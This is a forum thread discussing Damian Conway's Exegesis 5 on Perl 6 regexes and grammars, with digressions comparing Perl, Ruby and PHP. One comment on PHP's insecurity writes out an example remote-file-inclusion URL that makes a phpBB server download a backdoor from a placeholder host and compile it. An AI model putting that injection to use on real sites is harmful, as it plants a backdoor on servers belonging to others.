Damian Conway Publishes Exegesis 5
prostoalex writes "Come gather round Mongers, whatever you code,
And admit that your forehead's about to explode,
'Cos Perl patterns induce complete brain overload,
If there's source code you should be maintainin',
Then you better start learnin' Perl 6 patterns soon,
For the regexes, they are a-changin'.
This remix of Bob Dylan serves as an epigraph to Exegesis 5."
Quoting from the article:
"Even more importantly, as powerful as Perl 5 regexes are, they are not nearly powerful enough. Modern text manipulation is predominantly about processing structured, hierarchical text. And that's just plain painful with regular expressions. The advent of modules like Parse::Yapp and Parse::RecDescent reflects the community's widespread need for more sophisticated parsing mechanisms. Mechanisms that should be native to Perl."
Will these be compatible with the older ones? I mean backward compatibility; I certainly hope so.
There's a lot of new syntax there, so let's step through it slowly.
This goes a real whoa over my head, man. Seriously, I don't wanna be trolling, but I wish the language used was simpler. For a regex expert this is good, but for a newbie or mediocre-level guy like me this is bad!! And there are not many free regex courses on the net!
-Don
Take a look and feel free: http://www.PieMenu.com
I was excited for Perl 6 when it was first starting out, then I started reading about all the stuff that is going to change, and got worried. Now, after reading this, I've come to the conclusion that I am sticking with Perl 5. As for my Web stuff, I'm finally taking the plunge and learning PHP. Perl 6 is starting to become a completely different language, all my stuff works now, and I don't feel like porting.
Objects in the blog are closer then they ap
Bob Dylan rolling in his grave knocked over my drink!
Oh, wait, he's not dead yet.
Carry on . . .
----------
I am an expert in electricity. My father held the chair of applied electricity at the state prison.
I know guys who can regex in their sleep, and they've been using mostly compatible syntax for YEARS! This new stuff looks completely different, and if Perl isn't going to be backwards compatible, I foresee a huge backlash, or an AnotherGNUPerl fork or something. (AGP is taken... doh)
It's important to allow people to use existing skillsets while expanding into the new syntax.
Because I can't pronounce Exegesis. I can pronounce Perl.
Sorry!
Backward compatibility is over-rated
This might be a good thing, since parsing XML is becoming more important. Anyone get the same feeling, or am I smoking weed?
CPAN is a powerful resource. If all those modules get left behind, I fear we may end up with a more eloquent language in Perl 6 but with substantially less usability.
Ahhh, it's a good time to start using Ruby! I truly get happier and happier that I use Ruby with each Exegesis that comes out. I really don't understand what they're trying to accomplish with the language anymore. It's starting to look less like Perl and more like Befunge.
Couldn't they have been gentler? However, if it lets me handle HTML easily, without having to learn all kinds of packages that do lots of things I don't need, then I'm all for it.
John Roth
Watch that speed limit sign on the learning curve!
Some of this will be good for everyone. Some of it some of you won't like, but a lot of it you will. Give Perl 6 a chance, and don't react as if we've shot your pet.
- Why is Perl changing so much?!
Because it needs to. Perl is the legacy of something like 15 years of development and evolution. It started as a simple text processing system, and is now used in every field of endeavor where computers are used. There are some old things that needed to go, some new things that were needed and generally a need to re-examine the way "stuff" was done.
- But what about my programs? Why break them?!
Perl 6 is two things (at least): a parser for Perl 6 and a back-end virtual machine, much like Java or C#. One of the design criteria for the release of Perl 6 is a Perl 5 compatible parser front-end that outputs Perl 6 virtual machine bytecode. This means that your Perl 5 programs will run with no modification in a Perl 6 environment (or at most a path change to the interpreter, that much is still under some debate).
- Why would you want to break compatibility with other regular expression engines?
Remember that Perl has been leading the pack in terms of regular expression handling for a long time. Now Perl is moving beyond regular expressions to grammar specification. This is a good thing, as long as the benefits of regular expressions are preserved.
(switching into a Simpson's reference)
So we'll march day and night
Glennross and Glenngarry
Our syntactical structures are subject
To the whims of god Larry...
The only surefire protection against Microsoft infections is abstinence. - The Onion
I only had time to skim the article, and anyway it would take anyone a while to absorb all that code. Here's the short summary:
Regexes in Perl have accumulated too much cruft to be called regular expressions anymore. So now they're full grammars.
That's right. Now you can pattern match with a very readable grammar syntax that is easily decorated with Perl code to do parsing. YACC for Perl. You can find packages for this on CPAN, but this is integrated with the language.
No whining about the bad old days of Perl regex syntax for me... now I'm actually excited by the prospect of needing to buy a new llama book.
Most of the Perl 6 changes seem to be for the better, but two in particular gall me: changing arrow to dot, and changing ARGV to ARGS.
The rationale for losing arrow was that it made more operators available, and that it was more familiar to users of other OO languages. I suppose it's also easier to type; not only one less character, but no shift key. But it seemed like a change just to force old programs to be rewritten.
And ARGV? Simply because it was supposed to be old fashioned, unfamiliar, not obvious. BAH. Change for no reason other than to commit breakage and force a rewrite.
I will probably switch as time goes by, but to Ruby rather than Perl 6. If I'm going to have to touch every file, I may as well do it the right way.
Infuriate left and right
People--especially FUDchunkers--are missing the most important points:
Almost all of the most useful Perl5 code of today will be runnable by Perl6 tomorrow: the compiler will fall back to perl5 and the VM is language neutral (even more so than .NET it would seem).
In addition to running most perl5 modules as-is, Perl6 matching rules will have a perl5 backwards compatibility mode built in so you can continue using the Perl5 regular expressions you know and love from Perl, Java, and everywhere else that's adopted them as needed in Perl6 code.
Yes, Perl6 is a rewrite and introduces a lot of deep CS concepts and new syntax, but some care is being taken to assure that most Perl5 code will be runnable as is, while people learn about the power of some of the advanced tools Perl6 will provide.
Please Don't Panic (or incite others to): the apocalypses and exegeses are technical documents, they are not meant to be smooth, easy reading or to reassure today's perlers that their hard won skills will be useful. They're meant to describe what's new and different and usually why. Don't be scared by the new and different: just as with existing Perl, you should be able to adopt the powerful new concepts and syntax as you need to without having to swallow it whole or unlearn everything you already know.
Perl6 will be stunningly more powerful, expressive, and provide (optionally) the safety features required for average coders to implement large systems while letting experts use extremely powerful tools like closures, continuations, intricate pattern matching that have mostly been accessible in academic languages to this point. And it will still allow convenient scripts to be generated if that's what you need to do.
Remember folks, other languages can make shitty code smell nice, but it's still shitty code and you wouldn't want to eat^Wmaintain it.
- Barrie
Anyway, in the article, it says there will be an :any modifier that matches a string any way possible, and gives the example:
OK, so I get how it returns "ahhh", "ahh", and "ah" - but how the heck does saying "match any string that looks like 'ah*' any way possible" return "a"?
Is this an error in the article, or am I missing something extremely obvious?
Thanks!
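For what it's worth, the "a" follows from `h*` meaning "zero or more h", so a bare "a" already satisfies `ah*`. Here is a rough sketch of that in Python rather than Perl 6. It only imitates "match any way possible" by brute force, and the subject string "ahhh" and the helper name `all_matches` are assumptions made for illustration, since the article's own example isn't reproduced in this thread.

```python
import re

def all_matches(pattern, text):
    """Return every substring of text that the pattern matches in full.

    Brute-force stand-in for an exhaustive match: try each (start, end)
    pair instead of stopping at the first, greediest match.
    """
    compiled = re.compile(pattern)
    found = []
    for start in range(len(text)):
        for end in range(start, len(text) + 1):
            candidate = text[start:end]
            if compiled.fullmatch(candidate):
                found.append(candidate)
    return found

# An ordinary greedy match reports only the longest alternative.
print(re.match(r"ah*", "ahhh").group())   # ahhh

# Exhaustive matching also reports the case where h* matched zero h's.
print(all_matches(r"ah*", "ahhh"))        # ['a', 'ah', 'ahh', 'ahhh']
```

So the "a" is the case where the star matched nothing at all, which a greedy match never shows you.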
Someone asked this very question at Damian's Perl 6 talk at YAPC. According to Damian the "use CGI" (or whichever package) construct will tell the Perl 6 interpreter that the package being "use"'d is Perl 5 code. So the CPAN modules will still work.
Hopelessly pedantic since 1963.
I think that's not merely acceptable but actively encouraged. Perl6 is meant to be pretty much a different language from Perl5 - a nice, shiny new toy that will be great for some things and less good for others. Just like, say, Java. But you don't feel apologetic about not porting your Perl5 programs to Java, and neither should you about not porting them to Perl6.
Will Perl6 be a better new language than Ruby, Python and the rest? Aye, there's the rub. No idea.
--
What short sigs we have -
One hundred and twenty chars!
Too short for haiku.
I first used perl back in version 3, something like 12 years ago. I first really learned perl, v4, about 9 years ago. It did everything I ever needed.
Then, perl 5 came out. I didn't bother "learning" it -- that is, I've been using it, and when I really need to, I've used some perl 5 features, but I've learned them as I go (by example), and I know I'm not really using the full capabilities. (plus, though I know what I'm doing, I don't always know what to call what I'm doing -- I got stumped the other day when someone asked me how to do pointers in perl. I drew a blank, not making the connection to all the weird hash magic I'd been doing lately. But I digress.)
Anyway, the bottom line of this is: Perl 5 looked interesting, but like more of the same, and wasn't really compelling for me to buckle down and learn all the new features. Perl 6, on the other hand, scares me. In a good way.
Here's a page-by-page description of how I read the article:
- Page 1: Hm. Looks like they're describing a grammar with regex. Cool.
- Page 2: I can intuitively match against a set of strings! Wild. These strings can be expressions themselves? Even better!
- Page 3: It's a grammar. A full, honkin, real, honest-to-goodness grammar. That I can match against. Are those angels I hear singing?
- Page 4: <head explodes>
- Page 5: <drools>
Seriously, though, I was concerned at first that I'd have to learn something new, crazy, and difficult (given how screwed-up much of perl 5 has seemed, at times). I'm impressed. I'm very impressed. Yes, I have to learn something new and crazy, but it's not at all difficult. In fact, I think I've already learned it. The power that this new system holds, and, more importantly, the simplicity of it all, is amazing.
So, unlike some other posters, I can't wait for Perl 6. When does this come out, again? And, more importantly, when can I buy the new book?
(also, was I the only one who expected, after the demonstration of matching method invocations, to be told that the entire source code for perl6 was just one giant RegEx/Grammar?)
'Nuff said. I don't recommend this bloated and utterly obfuscated language for any professional endeavour.
But I agree its text matching capabilities are unique and good. Excellent. But that's it.
People who say "Perl is all I ever need" make me feel pain inside.
Gotta love the sense of humour. After describing one, two, and three colon rules (read the article, page three), they get to the potential fourth...
Basically the new rule (not 'regex') syntax seems to be bent on destroying Perl's "Line noise with a purpose" reputation...
"The best argument against democracy is a five minute chat with the average voter."
--Winston Churchill
Here's why I'm not panicking. I read the apocalypse, and realized that I've never used any of the (?.....) expressions in a regular expression, and I've been Perling for 4 years and have written 2 formal parsing modules, and scads of scriptlets to pull data from very loosely formatted files.
I'm glad that support for the /x flag is improving, but I'm ignoring most of Apocalypse 5 (until I find that I need advanced parsing capabilities), relying on the assurances that most of what I do with regexes will be preserved, and happily awaiting topicalizers and hyper operators.
Finally? No:
OK, so it was the fifth or sixth one ... but it's still the finest code in these islands!
Shop as usual. And avoid panic buying.
Could <head explodes> be a legal rule invocation? Rule with an argument?
Jeroen Nijhof
I hate reading docs online! I can't take my computer in the bathroom easily. I hope O'Reilly will be publishing a book for 6.0 in a timely manner!
-- Many men would appreciate a woman's mind more if they could fondle it
From the exegesis:
The first thing to note is that, like a Perl 5 qr, a Perl 6 rx can take (almost) any delimiters we choose. The $hunk pattern uses {...}, but we could have used:
rx/pattern/ # Standard
rx[pattern] # Alternative bracket-delimiter style
rx<pattern> # Alternative bracket-delimiter style
rx«forme» # Délimiteurs très chic
rx>pattern< # Inverted bracketing is allowed too (!)
rx»Muster« # Begrenzungen im korrekten Auftrag
rx!pattern! # Excited
rx=pattern= # Unusual
rx?pattern? # No special meaning in Perl 6
rx#pattern# # Careful with these: they disable internal comments
Are these allowed for the sole purpose of creating new T-Shirt patterns?
Note: this is probably going to be horrendously biased because 99% of the PHP stuff I do is maintaining and customizing a vBulletin. For those who have ever dealt with this piece of crapware I'll say nothing more. Suffice it to say that if you run diff on, say, newthread.php and newreply.php the output is disturbingly short.
... need I go on?
Look, I'm sorry but exactly what was supposed to be great about PHP? The fact that you can easily embed it in HTML code, that it integrates cleanly with MySQL and that you can pass args to it easily. Let us demolish each of these in sequence.
* HTML embedding - Ever heard of MVC? I'm sorry, but if you compare something like this:
<ul>
<?php foreach ($users as $user) { ?>
<li><a href="user.php?userid=<?php echo $user->userid ?>"><?php echo $user->username ?></a></li>
<?php } ?>
</ul>
and, say, the equiv in Template Toolkit:
<ul>
[% FOREACH user = users %]
<li><a href="user.pl?userid=[% user.userid %]">[% user.username %]</a></li>
[% END %]
</ul>
now you tell me which looks neater? HTML-like templating syntax just looks dire because it all falls apart when you have to include stuff inside attributes. Not only is it ugly but it's unmaintainable. Want to skin your site in PHP? Forget it. Want to skin it in perl/TT/CPAN templating engine of your choice? No problem, just supply a different base path to your template engine of choice. Of course most PHP coders have realized this so they've created their own templating engine, or use something like Smarty and just wrap everything in one great big PHP tag. Which quite frankly just defeats the entire point.
* Argument passing - this is hellish. Anything that comes in in a query string, cookie or post variable immediately enters your global namespace, where your often CRITICAL state variables are - hope you initialized them! I can't tell you how many times I got exploited by some stupid XSS exploit or the totally useless ability of include() to pull stuff in over HTTP. It's bad enough when a script kiddie just needs a unix system and the ability to use a compiler to root a machine but when 'h4xx0ring' can be done just by typing http://phpbb.mysite.com/includes/db.php?phpbb_root_path=http://my.webserver.com/&phpEx=txt&cmd=lynx+-source+http://my.webserver.com/1337-backdoor.c+|+gcc+-o+/tmp/1337-backdoor or something like that then it's quite clear that things are getting absolutely fucking ridiculous. In fact the PHP team have realized this and forced you to use $HTTP_POST_VARS or whatever other four-mile-long identifier to get at your vars (oh, sorry it's $_POST now) ... well, at least if php.ini says so. Which you can't count on anyway so I always write a little routine to bomb out the global namespace (except for the superglobals) at the start of each of my scripts. Stupid and unnecessary.
* MySQL integration - eh?! I'm sorry but I HATE the PHP MySQL API. The error handling is a joke so most people write their own wrappers around MySQL to catch errors and deal with them (that or it's back to checking the return value of every little thing. Thanks but if I wanted to do that I'd program in C). That and don't get me started on slashing. php.ini is set up so that your incoming variables may or may not get slashed. Again, you can't influence this or count on it if you've got shared hosting of some sort so either you've got to manually strip all the slashes out again or put them in - in which case you either have to deslashify something if you're using it internally or slashify it when passing it to mysql_query() to make sure someone doesn't take a great big shit all over your SQL. And that's if you're using MySQL. If you're using Postgres, there's a different API, and if you're using Oracle then there's a third. The fact that there's TWO different database abstraction systems built into the core of PHP (DBx and ODBC) and then some in PEAR shows that something is really horribly wrong.
Now compare to Perl DBI or Java JDBC or anything else which actually has a sane DB access API.
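use Carp qw(confess);
my $userid;   # declared outside the eval so it is still visible afterwards
eval {        # assumes $dbh was connected with RaiseError => 1
    my $sth = $dbh->prepare('SELECT userid FROM user WHERE username = ?');
    $sth->execute($username);
    ($userid) = $sth->fetchrow_array;   # list context: first column of the first row
};
if ($@) { confess "SQL Error: $@"; }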
which in PHP looks like
if (!get_magic_quotes_gpc()) {
    $username = addslashes($username);
}
$q = mysql_query("SELECT userid FROM user WHERE username = '$username'")
    or die("Query failed: " . mysql_error());
if ($r = mysql_fetch_row($q)) {
    $userid = $r[0];
}
I know which one I prefer. That and let's not forget the fact that every time you access a page, that page is parsed, its dependencies are parsed, initialization is performed, and then it handles your request. Also the standard library that comes with it is cack - everything is in the global namespace, there's no object orientation at all, parts of it look like the C standard library's been retrofitted into it because the designers were too damn lazy, it's inconsistent, there's several conflicting ways of doing everything and it's so badly designed that you're usually working AGAINST it than with it. (want to slurp a file? well you can use the file() command to make an array of lines, which you can join together again, or you can use readfile() which sends a file directly to the client, however you can get round that by using output buffering to capture it. Or you can use fopen() and the related commands to open the file, find its size, read it into a scalar then close it again. Aargh!)
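The real difference between the two snippets above is the placeholder: the DBI version hands the value to the driver separately from the SQL text, so nothing needs slashing by hand. A minimal sketch of the same idea, written in Python with the standard-library sqlite3 module only because that runs without a database server. The in-memory table, the sample rows and the helper name `find_userid` are all made up for illustration.

```python
import sqlite3

def find_userid(conn, username):
    """Look up a userid with a bound parameter instead of string interpolation."""
    row = conn.execute(
        "SELECT userid FROM user WHERE username = ?", (username,)
    ).fetchone()
    return row[0] if row else None

# Hypothetical in-memory database standing in for the real one.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE user (userid INTEGER PRIMARY KEY, username TEXT)")
conn.execute("INSERT INTO user (username) VALUES (?)", ("o'brien",))

# A quote in the value is just data; no escaping step is needed.
print(find_userid(conn, "o'brien"))        # 1

# A classic injection string is compared literally and matches nothing.
print(find_userid(conn, "x' OR '1'='1"))   # None
```

Errors surface as exceptions (sqlite3.Error here), which is roughly what wrapping the DBI calls in eval buys you.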
Now, look, I must admit Perl isn't great either. mod_perl is fast as lightning but it's got a ton of idiosyncrasies of its own (mainly in the way of including things, eg include paths, namespaces, etc) and a lot of weird side-effects that are far from obvious and get in the way most of the time. I've written my own mini-wrapper around it that irons most of it out but it's still quite a pain.
As for PHP though, it does have its place, but remember what PHP stands for - PHP Hypertext PREPROCESSOR (I think). As SSI on steroids with some ability to interface with MySQL, it's a great system. But writing things like messageboards or shopping carts or portals in PHP is sheer lunacy. I've managed a PhpBB and a vBulletin as well as writing a mini news system that integrates with vB so maybe my experience isn't that great and someone ought to hit me with a clue-by-four. But if you can, please do because from what I've seen I find it very hard to like this language.
Face it, until practical (it's supposed to be PRACTICALLY eclectic, remember) considerations are put in at least 50th place on the list of priorities, people will continue to avoid Perl. It's not that it doesn't have nice ideas, it's that they're put together really badly.
Trying to maintain Perl code, particularly someone else's, is impractical. Trying to memorise every little peccadillo of Perl unless you are a 24/7 hacker is impractical (and otherwise, you miss all its advantages anyway). Using Perl's regex for anything but trivial numbers of records is impractical. Mandating Perl for trivial simple administration scripts simply because of its all-encompassing features, thus requiring a full install of the ever growing perl environment, is impractical.
Perl was designed for the kind of person who, presented with perfectly functional, efficient code, always wants to demonstrate a "better way" to do it -- no matter how much better it isn't. There's More Than One Way To Do It, because the more ways I know, the smarter I am! Never mind how much more brainpower has to go into merely following code rather than the design behind it.
The kind of problem Perl is facing is being faced in many other "enthusiast-driven" projects. The emphasis is on project developer and project enthusiast enjoyment, and not on usability.
Which brings me back to my original Mathematica point. It was written for mathematicians and those in associated fields. It was not written for people who enjoy tracking development of a mathematical software package, by people whose mission it is to merely tinker with what seems "cool".
Fact: Perl is dying.
(joke, dammit)
You are upset that Perl 6 is changing significantly enough that you feel it could be classified as a different language. And you don't want to learn a new language so to solve your dilemma you are going to learn a different language? :)
but without the S
-c
I have discovered a truly remarkable proof which this margin is too small to contain.
Amen. Perl's great for 50 line scripts, crap for most of the stuff people try to use it for.
I'm surprised some chimp hasn't tried writing an operating system or a GUI word processor with it.
I'm a bit frustrated that they're fussin' so much around regex when OO Perl is a bit of a mess right now. The TMTOWTDI motto is a nightmare when it comes to OO because each developer has his own way of doing it, and building reusable class libs is tough! I would like to see more standardisation in that area - more than Damian's OO book, which simply suggests a way of doing it, but there's no real accepted method, and no way of enforcing anything at all. I'd like to see some developments on the encapsulation front, for example!
Considering all of the learning required to go from Perl5 to Perl6 and the fact that Perl6 probably won't exist for a couple more years, I wonder if the growth in Ruby users (traffic is steadily growing on comp.lang.ruby) is attributable to Perl folks jumping ship?
Ruby seems to offer a lot to current Perl programmers, especially when it comes to OO programming - I don't think anyone will argue that Ruby's OO model is much cleaner and more beautiful than Perl's.
Perl6 does seem to have some promising features (like being able to define grammars as shown in the current exegesis) though.... however, I suspect that these ideas don't require wholesale changes to a language (this could be a Ruby module for example).
re: "the entire source code for perl6 was just one giant RegExGrammar"...
$foo++;
use grammar 'Python' {
foo++
use grammar 'Perl' {
print "Hi" if $foo==2;
}
}
RE: * HTML embedding
You can also do this:
<? foreach ($users as $user)
{
include "templates/user/usertemplate.php";
}
?>
Then usertemplate.php contains
<li><a href="user.php?userid=<?= $user->userid ?>"><?= $user->username ?></a>
or
<? echo "<li><a href=\"user.php?userid={$user->userid}\">{$user->username}</a>"; ?>
The trick is if you tuck most (or all) of your html in the templates directory then you can have skinning. Just make multiple templates directories and keep track of which one you're pulling the content from. This forces you to split your html from your objects, and as a bonus you get more code reuse. Your object's html templates are neatly tucked away in their own directories.
RE: * Argument passing
Turn off register_globals and use $_REQUEST and the other superglobals to do what you need. Never trust user input, yadda yadda. This has been a weakness in the past, but now it's a bit harder to get burned. I shot myself in the foot a couple times and had to learn how to deal with this stuff. PHP is a newbie friendly language, but secure PHP takes some experience to get right.
RE: * MySQL integration
Agreed. About this time last year I finally rolled my own DB wrapper that does what I need. My gripe with most abstraction layers is that they may claim to be DB independent, but cater to the lowest common denominator: mysql. Sorry, but if I'm using a "real" database I'm going to break out the stored procedures, transactions and more. If I get to use stored procedures, then my overall approach is going to change enough to break the abstraction layer. Things may have improved, but the last time I looked at it I went with the db specific functions. I'd like to see some improvement here.
More notes:
As far as the 'parse, parse, reparse and initialize' cycle, you can alleviate some of that with caching. I've rolled functions to do this by output buffering entire pages (or significant includes), placing them on disk or in the database and serving those to the users. It depends on how often you update your site, but for fairly static pages it works OK. You can also break out the Zend cache or other products if you want to 'do it right'.
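Roughly, the output-caching trick described above looks like the sketch below. It is in Python rather than PHP so that it runs on its own. The cache directory, the five-minute freshness window and the names `cached_page` and `render_front_page` are all assumptions for illustration, not anything PHP or the Zend cache actually provides.

```python
import hashlib
import os
import tempfile
import time

CACHE_DIR = tempfile.mkdtemp(prefix="pagecache-")  # hypothetical cache location
TTL_SECONDS = 300                                  # assumed freshness window

def cached_page(key, render, ttl=TTL_SECONDS):
    """Serve the stored copy of a page if it is fresh, else render and store it."""
    path = os.path.join(CACHE_DIR, hashlib.sha256(key.encode()).hexdigest())
    try:
        if time.time() - os.path.getmtime(path) < ttl:
            with open(path, encoding="utf-8") as fh:
                return fh.read()
    except FileNotFoundError:
        pass  # nothing cached yet, fall through and render
    html = render()
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(html)
    return html

calls = []

def render_front_page():
    """Stand-in for the expensive parse/include/query work."""
    calls.append(1)
    return "<h1>Front page</h1>"

first = cached_page("/index", render_front_page)
second = cached_page("/index", render_front_page)
print(len(calls))   # 1: the second request was served from disk
```

How long a copy stays fresh is the whole trade-off: fine for fairly static pages, not so fine for anything personalised.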
I don't see a problem with three different ways to open a file. Each one has a use and a historical reason for existing. Each one also gets the job done for the general case. Yes the namespace is a bit cluttered but the docs are very good. It seems like a design goal for PHP has been to wrap every useful library they can. This brings in a bunch of the C style file operations. Then you get the design goal to make tools to build webpages. That gives you output buffering tricks and so on. Learning to deal with this is all a part of PHP.
Just because PHP makes it easy for a 'non-programmer' to submit a form to a database it doesn't mean that it is an easy language to use for large projects. Maintaining bad PHP is hell and refactoring can be problematic. However, I do think PHP is appropriate for portals, message boards, and online catalogs. You just need to take the right approach: Object orientation (or good procedural libraries), templates, php.ini tweaking, coding standards and so on. It's not the easiest language to scale up, but it can be done. The problem is that it is such an easy language to do little things in, they screw up when they do big things with it. Just like Perl.
I know you were kidding but....
There is a Perl/Tk spreadsheet. The fact that the underlying data structures of the spreadsheet are exposed to the macro language allows for some pretty incredible formulas.
Someone once said:
"It is possible to write spaghetti code in any language"
Remember that when you are using your favorite programming tool.
You can write very readable and clean code in Perl...
it just takes some discipline.
Yeah, well, same for me, except that I started with perl 5.0xx (with very little Perl 4 before that - didn't do much with it, because the Big Honkin' ManPage was pain to read in DOS!)
I know that for me, Perl 5.6 was not that big of a change. ("Oh, I can use 'use warnings;' instead of '-w'? That's readable! Oh, and 'our ($a, $b, $c)' instead of 'use vars qw($a $b $c)'? Gets better!")
And I know Perl 6 is not going to be a porting nightmare, and will make Perl much more readable in the long run. I heard, for example, that the hilariously obscure-sounding scalar(@arr) or unreadable-sounding $#arr+1 will be @arr.length (or something similar) there, which is only positive...
I will be happy when they implement a DWIM() function. That's Do What I Mean.
was I the only one who expected, after the demonstration of matching method invocations, to be told that the entire source code for perl6 was just one giant RegEx/Grammar?
That's correct, and has been Larry's plan since the beginning. The Perl6 eval will be a rule like so:
if /^<$code <perlgrammar>>$/ {
Parrot.execute $code.bytecode;
}
Add command-line handling and that's your /usr/bin/perl in a nutshell.
But because they're sooooo smart, they write things like this:
In other words, a raw variable in a Perl 6 pattern is matched as if it was a Perl 5 regex in which the interpolation had been quotemeta'd and then placed in a pair of non-capturing parentheses.
OK. OOOOK. I'm really looking forward to Perl 6 For Dummies. Now pardon me while I go back to reading something easy, like differential geometry.
But seriously, what really excites me about Perl 6 is Parrot. It's going to be just ultra-cool to be able to link to Python and Ruby (and C) with no fuss and no muss. To me, the rest is just syntactic sugar.
Find free books.
I thought it was "The determined programmer can write a FORTRAN program in any language." Or something.
"How can you claim that you are anti-crack, while still writing a window manager?" — Metacity README